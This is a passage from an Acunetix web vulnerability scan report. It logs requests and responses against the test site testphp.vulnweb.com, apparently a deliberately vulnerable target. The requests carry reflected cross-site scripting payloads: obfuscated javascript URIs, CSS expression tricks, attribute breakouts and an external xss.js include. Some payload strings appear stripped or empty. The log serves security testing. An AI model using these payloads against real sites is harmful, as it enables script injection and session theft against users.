.NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

91

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28541805967386%29%3B%22 %3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

92

/hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=<%00script>alert(541765967386)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

93

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

94

/listproducts.php Details

Request GET /listproducts.php?artist=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28488775932879%29% 3B%22%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist=email@somealert(488755932879)%3Bdomai n.com HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

95

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

96

/listproducts.php Details

Request GET /listproducts.php?artist=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28488935932953%29%3B%22%3 E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

97

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=alert(488695932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist="+src="http://testphp.acunetix.com/xss.js?4891559 33047"> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

98

/listproducts.php Details Request GET /listproducts.php?artist=
alert(489175933047)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=alert(488735932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=>'>alert(488705932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

99

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request Acunetix Website Audit

100

GET /listproducts.php?artist=alert(488725932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=>">alert(488715932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=-->alert(488745932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Acunetix Website Audit

101

Content-Type: text/html Connection: close /listproducts.php Details Request GET /listproducts.php?artist=%3C/xss/*-*/style=xss:e/**/xpression(alert(489385933127))%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=alert(488835932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=alert(488825932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Acunetix Website Audit

102

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=-->alert(488845932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=>'>alert(488805932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request Acunetix Website Audit

103

GET /listproducts.php?cat=>">alert(488815932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=alert(488795932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

104

/listproducts.php Details Request GET /listproducts.php?cat=
alert(489275933088)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?cat="+src="http://testphp.acunetix.com/xss.js?4892559330 88"> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

105

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=%3C/xss/*-*/style=xss:e/**/xpression(alert(489485933177))%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET Acunetix Website Audit

106

/listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=domain.c om HTTP/1.0 Acunetix Website Audit

108

Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?cat=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28488875932881%29%3B% 22%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

